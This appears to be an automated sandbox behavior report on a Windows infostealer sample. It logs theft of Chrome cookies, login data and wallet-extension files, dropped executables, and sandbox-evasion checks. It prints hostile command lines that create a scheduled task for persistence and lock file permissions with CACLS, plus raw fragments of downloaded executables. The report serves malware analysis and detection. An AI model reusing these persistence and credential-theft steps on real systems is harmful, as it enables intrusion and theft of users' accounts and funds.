NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da5810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da6810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da7810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da8810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da9810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076daa810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076dab810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076dac810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076dad810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076dae810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076daf810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076db0810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076db1810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076db2810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800

Steals private information from local Internet browsers (19 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fmblappgoiilbgafhjklehhfifbdocee
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (18 events)

file	C:\Users\test22\AppData\Local\Temp\1000308001\toolspub2.exe
file	C:\Users\test22\Pictures\Minor Policy\Fbvl4QloH4gG7tQ0zjEO4fTN.exe
file	C:\Users\test22\Pictures\Minor Policy\B4xOa2tIkWnlwQUw0ktE4tUz.exe
file	C:\Users\test22\AppData\Local\Temp\1000309001\31839b57a4f11171d6abc8bbc4451ee4.exe
file	C:\Users\test22\Pictures\Minor Policy\D445QVy6fBc8sYldcvsAOYlp.exe
file	C:\Users\test22\Pictures\Minor Policy\mAOUez2DUv07HLYgPAj9J3lL.exe
file	C:\Users\test22\Pictures\Minor Policy\AzMvEtnuIOGeJNu6CIpkXMkU.exe
file	C:\Users\test22\Pictures\Minor Policy\roxaidHeyogEYigLYEhLdXte.exe
file	C:\Users\test22\Pictures\Minor Policy\becqzJfzNHYO4iYojmAxqmCr.exe
file	C:\Users\test22\Pictures\Minor Policy\UGF12yv5bvCGEXJmBLvQOV8c.exe
file	C:\Users\test22\Pictures\Minor Policy\VM_XuQhtwE4MZh2SBtXgFZit.exe
file	C:\Users\test22\Pictures\Minor Policy\6emCr1XoWbH0qII1NEhQIfRv.exe
file	C:\Users\test22\AppData\Local\Temp\1000307001\chrome.exe
file	C:\Users\test22\Pictures\Minor Policy\3KfeH1BjqwYOYmBk757AOJH_.exe
file	C:\Users\test22\AppData\Local\Temp\7zS7E9C.tmp\Install.exe
file	C:\Users\test22\Pictures\Minor Policy\rtdFkAuPE9DxvfUDAEoimy_z.exe
file	C:\Users\test22\AppData\Local\Temp\7zS8572.tmp\Install.exe
file	C:\Users\test22\Pictures\Minor Policy\K0YrHneBJRok9kkcgxcVi1wX.exe

Creates hidden or system file (3 events)

Time & API	Arguments	Status	Return
SetFileAttributesW Sept. 6, 2023, 2:03 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Windows\System32\GroupPolicy filepath: C:\Windows\System32\GroupPolicy	1	1
SetFileAttributesW Sept. 6, 2023, 1:57 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Windows\System32\GroupPolicy filepath: C:\Windows\System32\GroupPolicy	1	1
SetFileAttributesW Sept. 6, 2023, 2:04 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Windows\System32\GroupPolicy filepath: C:\Windows\System32\GroupPolicy	1	1

Creates a suspicious process (6 events)

cmdline	"C:\Windows\System32\regsvr32.exe" /s UGU3D.TH /u
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y\|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
cmdline	regsvr32.exe /s UGU3D.TH /u

Drops an executable to the user AppData folder (4 events)

file	C:\Users\test22\AppData\Local\Temp\1000309001\31839b57a4f11171d6abc8bbc4451ee4.exe
file	C:\Users\test22\AppData\Local\Temp\1000308001\toolspub2.exe
file	C:\Users\test22\AppData\Local\Temp\UGU3D.TH
file	C:\Users\test22\AppData\Local\Temp\1000307001\chrome.exe

Executes one or more WMI queries (1 event)

wmi	<INVALID POINTER>

A process created a hidden window (15 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Sept. 6, 2023, 2:04 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\K0YrHneBJRok9kkcgxcVi1wX.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\K0YrHneBJRok9kkcgxcVi1wX.exe	1	1
ShellExecuteExW Sept. 6, 2023, 2:04 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\mAOUez2DUv07HLYgPAj9J3lL.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\mAOUez2DUv07HLYgPAj9J3lL.exe	1	1
ShellExecuteExW Sept. 6, 2023, 2:04 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\roxaidHeyogEYigLYEhLdXte.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\roxaidHeyogEYigLYEhLdXte.exe	1	1
ShellExecuteExW Sept. 6, 2023, 2:04 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\VM_XuQhtwE4MZh2SBtXgFZit.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\VM_XuQhtwE4MZh2SBtXgFZit.exe	1	1
ShellExecuteExW Sept. 6, 2023, 2:04 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\Fbvl4QloH4gG7tQ0zjEO4fTN.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\Fbvl4QloH4gG7tQ0zjEO4fTN.exe	1	1
ShellExecuteExW Sept. 6, 2023, 2:04 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\UGF12yv5bvCGEXJmBLvQOV8c.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\UGF12yv5bvCGEXJmBLvQOV8c.exe	1	1
ShellExecuteExW Sept. 6, 2023, 2:04 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\6emCr1XoWbH0qII1NEhQIfRv.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\6emCr1XoWbH0qII1NEhQIfRv.exe	1	1
ShellExecuteExW Sept. 6, 2023, 1:58 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\D445QVy6fBc8sYldcvsAOYlp.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\D445QVy6fBc8sYldcvsAOYlp.exe	1	1
ShellExecuteExW Sept. 6, 2023, 1:58 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\B4xOa2tIkWnlwQUw0ktE4tUz.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\B4xOa2tIkWnlwQUw0ktE4tUz.exe	1	1
ShellExecuteExW Sept. 6, 2023, 2:05 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe	1	1
ShellExecuteExW Sept. 6, 2023, 2:05 p.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW Sept. 6, 2023, 2:05 p.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y\|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit filepath: cmd	1	1
ShellExecuteExW Sept. 6, 2023, 2:05 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000307001\chrome.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000307001\chrome.exe	1	1
ShellExecuteExW Sept. 6, 2023, 2:05 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000308001\toolspub2.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000308001\toolspub2.exe	1	1
ShellExecuteExW Sept. 6, 2023, 2:05 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000309001\31839b57a4f11171d6abc8bbc4451ee4.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000309001\31839b57a4f11171d6abc8bbc4451ee4.exe	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (13 events)

Time & API	Arguments	Status	Return
Process32NextW Sept. 6, 2023, 2:03 p.m.	snapshot_handle: 0x000000000000016c process_name: SearchProtocolHost.exe process_identifier: 936	1	1
Process32NextW Sept. 6, 2023, 2:03 p.m.	snapshot_handle: 0x000000000000016c process_name: SearchFilterHost.exe process_identifier: 2000	1	1
Process32NextW Sept. 6, 2023, 2:03 p.m.	snapshot_handle: 0x000000000000016c process_name: mobsync.exe process_identifier: 2272	1	1
Process32NextW Sept. 6, 2023, 2:03 p.m.	snapshot_handle: 0x000000000000016c process_name: pw.exe process_identifier: 2316	1	1
Process32NextW Sept. 6, 2023, 2:03 p.m.	snapshot_handle: 0x000000000000016c process_name: taskhost.exe process_identifier: 2348	1	1
Process32NextW Sept. 6, 2023, 2:03 p.m.	snapshot_handle: 0x000000000000016c process_name: WWW14_n.exe process_identifier: 2548	1	1
Process32NextW Sept. 6, 2023, 1:57 p.m.	snapshot_handle: 0x00000000000003b8 process_name: svchost.exe process_identifier: 2072	1	1
Process32NextW Sept. 6, 2023, 1:57 p.m.	snapshot_handle: 0x00000000000003b8 process_name: taskhost.exe process_identifier: 1400	1	1
Process32NextW Sept. 6, 2023, 1:57 p.m.	snapshot_handle: 0x00000000000003b8 process_name: 6emCr1XoWbH0qII1NEhQIfRv.exe process_identifier: 2544	1	1
Process32NextW Sept. 6, 2023, 1:57 p.m.	snapshot_handle: 0x00000000000003b8 process_name: Fbvl4QloH4gG7tQ0zjEO4fTN.exe process_identifier: 2528	1	1
Process32NextW Sept. 6, 2023, 1:57 p.m.	snapshot_handle: 0x00000000000003b8 process_name: roxaidHeyogEYigLYEhLdXte.exe process_identifier: 2564	1	1
Process32NextW Sept. 6, 2023, 1:57 p.m.	snapshot_handle: 0x00000000000003b8 process_name: vbc.exe process_identifier: 1140	1	1
Process32NextW Sept. 6, 2023, 1:57 p.m.	snapshot_handle: 0x00000000000003b8 process_name: WmiPrvSE.exe process_identifier: 1888	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 6, 2023, 2:04 p.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 36864 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x02441000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 6, 2023, 2:03 p.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the processes www14_n.exe, roxaidheyogeyiglyehldxte.exe, oneetx.exe (5 events)

Time & API	Arguments	Status	Return
InternetReadFile Sept. 6, 2023, 2:03 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÌÉw§Éw§Éw§É<ëVÉw§É<ëTÉw§É<ëUÉw§ÉZÉw§É£Èw§É¤Èw§É¢È½w§É$Éw§É4Éw§Éw¦Év§É¢È¹w§É§Èw§ÉXÉw§É¥Èw§ÉRichw§ÉPELÔÌtdà!.@@p@Áã4´ãP`øß@Ü#°ÁT¨f@@x\Ø .text¼-. `.rdataÐ±@²2@@.dataPGä@À.didat¤Pö@À.rsrcøß`àø@@.relocÜ#@$Ø@Bh`DèºWÃÌÌÌÌÌ¹Ä0DéfÌÌÌÌÌÌ¹p0Dè×h`=Cè.óYÃÌÌÌÌÌÌÌÌÌÌhp=CèóYÃÌÌÌÌèñ £¢DÃÌÌÌÌÌ¹¢DéÌÌÌÌÌÌ¹ Fèkôh=CèÞòYÃÌÌÌÌÌÌÌÌÌÌ¹XEèKôh=Cè¾òYÃÌÌÌÌÌÌÌÌÌÌ¹°XEèSh =CèòYÃÌÌÌÌÌÌÌÌÌÌh°=CèòYÃÌÌÌÌUììXSVW}µ¨ûÿÿ»ÿtASWÆPè ÆPè>Yµªûÿÿ4F¨ûÿÿÎ+ÈÃÑù+ÁPWVèöVè[>Y4FÆ¨ûÿÿÎ+ÈÃÑù+ÁPh£èÝçPVèÇVè,>Y¨ûÿÿ4FÆÆ+ÁÑø+ØShðECVè Vè>3ÉjXfLFE¨^VQPèýÿEÄ]}E¬¡h0DE°¨ûÿÿE´EEØE¨u¨}ÄÇEÈÇEÜPÛtÿPPFëÿXPFðöu,ÿTPF=0u3ÀfE¨PÛtÿPPFëÿXPFðö_^À[ÉÂUìì,EüVPÿ¤PFÀu`E3ÉEÜÔýÿÿEäEEèEÜPMàÇEìAMðMôÿPFðöt)SÿuVÿPFMüÀVQÃrÎÿxBCÿÖÃ[ë2À^ÉÂÌÌÂ¶D$Pÿt$ÿt$ÿtQFPÿpQFÂ¶D$÷ØÀà Pÿt$ÿt$ÿtQFPÿQFÂUì}0tY}u]E ¹p0D$¶ÀPÿuÿuèçâöE t>ÿuÿhQFÀt1h!0PÿtQFÀt!öE thôECPÿlQFë ÿu¹p0Dè\|â2À]ÂUìE=rEPEPèC EPÿuèMëYY]ÂUììLM´ÿuèVÿuE´PèM´è\|ÉÂL$Q@ús D$ÿA@ÂVÿt$ñ3ÀFFFè0Æ^Â¸ó7Cèêê request_handle: 0x0000000000cc006c	1	1
InternetReadFile Sept. 6, 2023, 1:57 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $]üMoooBoBoBoÌoÌ oÌ5oBooºoomooRichoPELÚXdàZÈo;p@`@Èàd à0p PÓpdÔÀÓ@p.textYZ `.rdatad\|p~^@@.datah$ðÜ@À.rsrcà ô@@.relocp 0"ö@BhP6BèÏ(YÃÌÌÌÌhð5Bè¿(YÃÌÌÌÌj h\ÃB¹ûBèÿh°6Bè(YÃÌÌÌj hÃB¹Cèßh7Bè~(YÃÌÌÌjh¤ÃB¹Cè¿hp7Bè^(YÃÌÌÌj h¬ÃB¹üBèhÐ7Bè>(YÃÌÌÌjhÐÃB¹DCèh08Bè(YÃÌÌÌjhäÃB¹´úBè_h8Bèþ'YÃÌÌÌjh[ÃB¹ÔCè?hð8BèÞ'YÃÌÌÌjh[ÃB¹LCèhP9Bè¾'YÃÌÌÌjh[ÃB¹¬üBèÿh°9Bè'YÃÌÌÌjh[ÃB¹TúBèßh:Bè~'YÃÌÌÌjhÄB¹DûBè¿hp:Bè^'YÃÌÌÌjhÄB¹tCèhÐ:Bè>'YÃÌÌÌjh ÄB¹<ýBèh0;Bè'YÃÌÌÌjh4ÄB¹\Cè_h;Bèþ&YÃÌÌÌj(hDÄB¹LCè?hð;BèÞ&YÃÌÌÌjhpÄB¹ÿBèhP<Bè¾&YÃÌÌÌjh\|ÄB¹ìCèÿh°<Bè&YÃÌÌÌjDhÄB¹tCèßh=Bè~&YÃÌÌÌj\hÐÄB¹düBè¿hp=Bè^&YÃÌÌÌjh0ÅB¹TýBèhÐ=Bè>&YÃÌÌÌjh@ÅB¹\|ùBèh0>Bè&YÃÌÌÌjhHÅB¹\|ÿBè_h>Bèþ%YÃÌÌÌj<hdÅB¹LùBè?hð>BèÞ%YÃÌÌÌjh¤ÅB¹4ùBèhP?Bè¾%YÃÌÌÌjh´ÅB¹ôCèÿh°?Bè%YÃÌÌÌjhÌÅB¹Cèßh@Bè~%YÃÌÌÌjXhàÅB¹,þBè¿hp@Bè^%YÃÌÌÌjh<ÆB¹CèhÐ@Bè>%YÃÌÌÌjhTÆB¹ÜCèh0ABè%YÃÌÌÌjh`ÆB¹DCè_hABèþ$YÃÌÌÌjhlÆB¹$úBè?hðABèÞ$YÃÌÌÌ request_handle: 0x0000000000cc0030	1	1
InternetReadFile Sept. 6, 2023, 2:05 p.m.	buffer: MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $Î:"[LÃ[LÃ[LÃ ÙÃ[LÃ ÈÃ¦[LÃ ÏÃâ[LÃ7Ã[LÃ[MÃ [LÃ ÆÃ[LÃ ØÃ[LÃ ÝÃ[LÃRich[LÃPELa@cà ®xpÀ@P¼á±xÀøâ°@ 8@à.textH¬® `.dataóþÀ.²@À.rsrcøâÀäà@@.reloc° Ä@BP·l··4·¢³²³Â³Ø³ì³´"´4´H´d´t´´¦´¼´Ô´æ´ø´µ µ>µPµ`µ³µµ°µÄµÐµäµ¶¶4¶H¶\¶p¶¶:¼¼¼¼ò»³r³`³pµ¨·À·È·ä·ü·¸,¸<¸H¸\¸p¸¸ª¸¾¸Ð¸â¸î¸þ¸¹¹:¹F¹R¹`¹n¹\|¹¹¹ª¹¸¹Â¹Ø¹ä¹ö¹ºº º6ºPºhººº¢º¼ºÌºâºüº»»$»:»L»b»r»»¬»¼»Ì»Þ»¬¶ø¶ê¶Ü¶Ê¶¾¶·Ö¢Bì¢B£BÊ¢BK@Ï@ An2A1×@ºUA4Ð@,©ìdY9-bad allocationÿÿÿÿ(@@B@z@;@ÎF@\9@ír@Cp<@dC@\C@ <@©C@\C@¨9@Åt@\C@string too longinvalid string positionø9@Xz@z@Unknown exception:@yz@z@X:@ø@csmà LC_TIMELC_NUMERICLC_MONETARYLC_CTYPELC_COLLATELC_ALLl@9@`@PÈBNAT@PÈB¡@H@PÈBÿ@<@PÈB0ý@4@PÈBrü@ !"#$%&'()+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~_.,._;==; ((((( H h(((( H H ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ !"#$%&'()+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ !"#$%&'()+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{\|}~ request_handle: 0x00cc000c	1	1
InternetReadFile Sept. 6, 2023, 2:05 p.m.	buffer: MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $Î:"[LÃ[LÃ[LÃ ÙÃ[LÃ ÈÃ¦[LÃ ÏÃâ[LÃ7Ã[LÃ[MÃ [LÃ ÆÃ[LÃ ØÃ[LÃ ÝÃ[LÃRich[LÃPELZ+bà ®xpÀ@P-h±xÀøâ°@ 8@à.textX¬® `.dataóþÀ.²@À.rsrcøâÀäà@@.reloc° Ä@B`·\|··D·²³Â³Ò³è³ü³´2´D´X´t´´´¶´Ì´ä´ö´µ µ0µNµ`µpµ ³µ¤µÀµÔµàµôµ¶.¶D¶X¶l¶¶¶J¼:¼$¼¼¼³³p³µ¸·Ð·Ø·ô·¸$¸<¸L¸X¸l¸¸¸º¸Î¸à¸ò¸þ¸¹$¹:¹J¹V¹b¹p¹~¹¹ ¹®¹º¹È¹Ò¹è¹ô¹ºº º0ºFº`ºxºº¤º²ºÌºÜºòº»»"»4»J»\»r»»»¼»Ì»Ü»î»¼¶·ú¶ì¶Ú¶Î¶·æ¢Bü¢B£BÚ¢BK@Ï@ An2A1×@ºUA4Ð@h'ád;9-bad allocationÿÿÿÿ,@@B@z@;@ÎF@`9@ír@Ct<@dC@\C@$<@©C@\C@¬9@Åt@\C@string too longinvalid string positionü9@Xz@z@Unknown exception:@yz@z@\:@ø@csmà LC_TIMELC_NUMERICLC_MONETARYLC_CTYPELC_COLLATELC_ALLl@9@`@PÈBNAT@PÈB¡@H@PÈBÿ@<@PÈB0ý@4@PÈBrü@ !"#$%&'()+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~_.,._;==; ((((( H h(((( H H ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ !"#$%&'()+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{\|}~ request_handle: 0x00cc000c	1	1
